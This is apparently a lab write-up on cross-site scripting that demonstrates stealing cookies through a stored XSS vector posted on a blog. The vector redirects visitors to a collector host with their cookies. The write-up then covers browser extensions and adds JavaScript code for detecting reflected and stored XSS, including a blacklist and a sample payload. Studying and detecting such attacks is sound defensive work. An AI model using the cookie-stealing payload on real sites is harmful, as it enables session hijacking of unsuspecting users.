According to the CERT Coordination Center, a web page contains both text and HTML markup that is generated by the server and interpreted by the client browser. Web sites that serve only static pages have complete control over how the client browser interprets those pages, whereas web sites that generate dynamic pages do not. If untrusted content can be introduced into a dynamic page, neither the server nor the client has enough information to recognise this malicious activity.
Stored XSS Attack
Stealing cookies using XSS
A cookie can be retrieved from the browser with the script 'document.cookie'. Blogs hosted by blogspot.com are vulnerable to XSS attacks. For the purpose of cookie stealing, a blog hosted by blogspot.com was used, with the following XSS vector: <script>document.location='http://172.16.16.10/labproj/insert.php/?vector='+document.cookie</script>.
• This script was posted in a blog http://labxssproj.blogspot.com hosted by blogspot.com.
• 172.16.16.106 is the IP address of the machine hosting insert.php and the database storing cookie values.
• Whenever any user visits http://labxssproj.blogspot.com, they are redirected to http://172.16.16.10/labproj/insert.php/?vector='+document.cookie, and their cookie is saved in the database on the machine 172.16.16.106. This cookie can then be used for session hijacking.
Available Mozilla Firefox Extensions
YesScript Firefox Extension
noXSS Firefox Extension
noXSS is a Firefox extension that protects against reflected XSS. Basically, noXSS checks all executed scripts against the relevant request data. If a certain amount of request data is found within a script, noXSS assumes that an XSS attempt has occurred and prevents the execution of the whole script.
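The following is an added example of the kind of heuristic the paragraph attributes to noXSS; it is not noXSS's own code. Every decoded query-string value of the request is compared with the text of each script the page would execute, and a script is flagged when a run of at least MIN_MATCH characters of request data appears verbatim inside it. The constant MIN_MATCH, the function names and the sample URL and scripts are all assumptions constructed for this illustration.

```javascript
// Added example (not noXSS's own code): a reflected-XSS heuristic of the
// kind the text attributes to noXSS. Each decoded query-string value of the
// request is compared with the text of every script that the page would
// execute; a script is flagged when a run of at least MIN_MATCH characters
// of request data appears verbatim inside it.

// Assumption: fewer than 8 shared characters is treated as noise
// (short words such as "search" legitimately appear in both places).
const MIN_MATCH = 8;

// Decoded values of every query-string parameter in the request URL.
// (Only the query string is inspected here; a real extension would also
// look at POST bodies and the fragment identifier.)
function requestParamValues(url) {
  return Array.from(new URL(url).searchParams.values());
}

// Length of the longest common substring of a and b
// (classic dynamic-programming scan, O(|a| * |b|) time, O(|b|) space).
function longestCommonSubstring(a, b) {
  let best = 0;
  let prev = new Array(b.length + 1).fill(0);
  for (let i = 1; i <= a.length; i++) {
    const cur = new Array(b.length + 1).fill(0);
    for (let j = 1; j <= b.length; j++) {
      if (a[i - 1] === b[j - 1]) {
        cur[j] = prev[j - 1] + 1;
        if (cur[j] > best) best = cur[j];
      }
    }
    prev = cur;
  }
  return best;
}

// Return one record per script whose text contains at least minMatch
// consecutive characters taken from some request parameter value.
function detectReflectedScripts(url, scriptTexts, minMatch = MIN_MATCH) {
  const params = requestParamValues(url).filter((v) => v.length >= minMatch);
  const flagged = [];
  scriptTexts.forEach((src, index) => {
    for (const value of params) {
      const matched = longestCommonSubstring(value, src);
      if (matched >= minMatch) {
        flagged.push({ index, matched, param: value });
        break; // one hit is enough to block this script
      }
    }
  });
  return flagged;
}

// Constructed sample: a search page whose q parameter is echoed unescaped
// into the response, so the injected script element becomes the second
// script on the page.
const SAMPLE_URL =
  "http://example.test/search?q=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E";
const SAMPLE_SCRIPTS = [
  "var page = 'search';",   // legitimate inline script
  "alert(document.cookie)", // body of the reflected <script> element
];

if (typeof require !== "undefined" && require.main === module) {
  console.log(detectReflectedScripts(SAMPLE_URL, SAMPLE_SCRIPTS));
}
```

Run with node: the second script is reported with a 22-character match, while the first is not, because the only request value ("shoes"-style short words aside) that it shares with the URL is far below the threshold. The weakness of this approach is visible in the same numbers: a site that legitimately copies a long parameter value into an inline script (a JSON blob of search options, say) will trigger the same block, which is why extensions of this kind block the whole script rather than trying to excise the reflected part.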
NoScript Firefox Extension
For stored XSS detection, an extension for Mozilla Firefox called 'StoredXSSdetector' was created. This extension maintains a blacklist of XSS vectors and of character strings commonly used in XSS attacks, such as document.cookie. The blacklist is stored in a database. After a page is rendered in the browser, the extension checks all the script tags in the page.
Using the DOM properties of HTML, the extension checks whether the content of each <script> element contains any of the XSS vectors held in the database. getElementsByTagName() returns all elements with a specified tag name, so this node access method can be used to find all the tags in the web page. The easiest way to get or modify the content of an element is the innerHTML property; it can also be used to view the source of a page that has been dynamically modified. The innerHTML property is therefore used to read the contents of all script tags and check them against the blacklist of XSS vectors. The extension generates alerts warning the user of the XSS vector present in the rendered web page, hence making the user aware of the XSS attack.
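The following is an added example of the check the two paragraphs above describe; it is not the StoredXSSdetector extension's own code. It separates a pure scanning function, which can be tested outside a browser, from a thin DOM wrapper that walks getElementsByTagName("script") and reads innerHTML as the text describes. The blacklist entries, the whitespace/case normalisation, the function names and the stand-in document are all assumptions constructed for this illustration; the stored payload in the sample is modelled on the cookie-stealing vector discussed earlier, with a placeholder host.

```javascript
// Added example (not the StoredXSSdetector extension's own code): the
// blacklist check the text describes, split into a pure scanning function
// and a DOM wrapper built on getElementsByTagName and innerHTML.

// Constructed blacklist of strings commonly found in XSS vectors.
// A real extension keeps this in a database and updates it over time.
const XSS_BLACKLIST = [
  "document.cookie",
  "document.location=",
  "String.fromCharCode(",
  "eval(",
];

// Strip whitespace and fold case so that "document . Cookie" still matches.
// (Assumption: a plain substring check after this normalisation.)
function normalise(text) {
  return text.replace(/\s+/g, "").toLowerCase();
}

// Pure check: for each script's text, record which blacklist entries it contains.
function scanScripts(scriptTexts, blacklist = XSS_BLACKLIST) {
  const normalisedList = blacklist.map(normalise);
  const findings = [];
  scriptTexts.forEach((src, index) => {
    const norm = normalise(src);
    const hits = blacklist.filter((_, i) => norm.includes(normalisedList[i]));
    if (hits.length > 0) findings.push({ index, hits });
  });
  return findings;
}

// DOM wrapper, to be run after the page has rendered (for example from the
// load event in a content script). `notify` receives the alert text; in a
// browser pass (m) => window.alert(m).
function scanRenderedPage(doc, notify) {
  const scripts = Array.from(doc.getElementsByTagName("script"));
  const findings = scanScripts(scripts.map((s) => s.innerHTML));
  if (findings.length > 0) {
    const report = findings
      .map((f) => `script #${f.index}: ${f.hits.join(", ")}`)
      .join("\n");
    notify(`Possible stored XSS vector on this page:\n${report}`);
  }
  return findings;
}

// Constructed stand-in for a rendered document, so the scan can run outside
// a browser: one harmless counter script and one stored payload modelled on
// the cookie-stealing vector discussed above (placeholder host).
const FAKE_DOCUMENT = {
  getElementsByTagName(tag) {
    if (tag !== "script") return [];
    return [
      { innerHTML: "var visits = (visits || 0) + 1;" },
      { innerHTML: "document.location='http://collector.example/insert.php?vector='+document.cookie" },
    ];
  },
};

if (typeof require !== "undefined" && require.main === module) {
  scanRenderedPage(FAKE_DOCUMENT, (msg) => console.log(msg));
}
```

Inside an extension the call is scanRenderedPage(document, (m) => window.alert(m)) once the page has loaded. Note what this check does and does not see: it reads the static text of script elements, so a payload assembled at run time (for example from String.fromCharCode calls that themselves are not on the blacklist, or loaded via an external src attribute) is only caught if one of its fragments is listed, and it reports the vector rather than blocking it, which is why the extension is described as a detector that makes the user aware of the attack.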